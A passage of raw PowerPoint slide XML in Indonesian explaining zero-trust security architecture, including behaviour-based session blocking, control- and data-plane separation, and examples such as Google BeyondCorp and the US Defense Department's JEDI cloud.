            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> nominal, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diblokir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihentikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Memisahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diskalakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsistensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlepas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelolaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencurigakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mudah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemantauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berkelanjutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>independen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihentikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perilaku</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>anomali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdeteksi</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147</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301810766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Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>BeyondCorp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>BeyondCorp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>luas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepercayaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>BeyondCorp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lapisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>verifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> internal Google. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Perusahaan Bersama (JEDI)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Cloud JEDI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>milik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Departemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merupakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proyek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
